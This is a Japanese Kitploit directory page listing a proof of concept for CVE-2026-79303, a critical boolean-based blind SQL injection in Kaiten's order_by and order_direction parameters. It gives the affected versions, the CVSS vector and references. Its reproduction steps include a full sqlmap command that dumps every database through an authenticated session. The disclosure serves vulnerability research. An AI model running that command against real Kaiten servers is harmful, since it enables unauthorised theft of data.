Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-79303 — CVE-2026-79303の概念実証。Kaitenのorder_byおよびorder_directionパラメータに影響する重大なブールベースブラインドSQLインジェクションであり、再現手順とCVSS 9.9の詳細を含む。 | Kitploit
ツール/GitHubGitHub/4ybrick/cve-2026-79303
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHub4ybrick/cve-2026-79303

CVE-2026-79303

CVE-2026-79303の概念実証。Kaitenのorder_byおよびorder_directionパラメータに影響する重大なブールベースブラインドSQLインジェクションであり、再現手順とCVSS 9.9の詳細を含む。

リポジトリを見る
20時間23分前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-79303

ブール型ブラインドSQLインジェクション

説明: 必要なデータ検証を行わず、パラメータ化されたステートメントやストアドプロシージャを使用せずに動的SQLステートメントが生成されます。

影響: SQLi

CVSSv3.1ベクター: AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H (9.9 Critical)

CWE: CWE-89: SQLコマンドで使用される特殊要素の不適切な無害化('SQLインジェクション')

影響を受けるコンポーネント: GETパラメータ order_by および order_direction

ベンダー: kaiten

影響を受ける製品

  • kaiten バージョン: 57.192.20 < 57.214.26

再現手順:

  1. sqlmap -u "https://[kaiten ip]/api/cards?version=2&limit=51&query=1&order_by=1&order_direction=desc&search_fields=title" --cookie="connect.sid=[value]" -p 'order_by' --technique B --level 5 --dbms postgresql --dbs --dump
  2. n(クッキーを新しいものとマージしない)と入力 -> C
Уязвимый параметр

発見者

  • Danil Belov

参考情報

  • https://nvd.nist.gov/vuln/detail/CVE-2026-79303
  • https://bdu.fstec.ru/vul/2025-02933
  • https://kaiten.ru/
ツールをダウンロード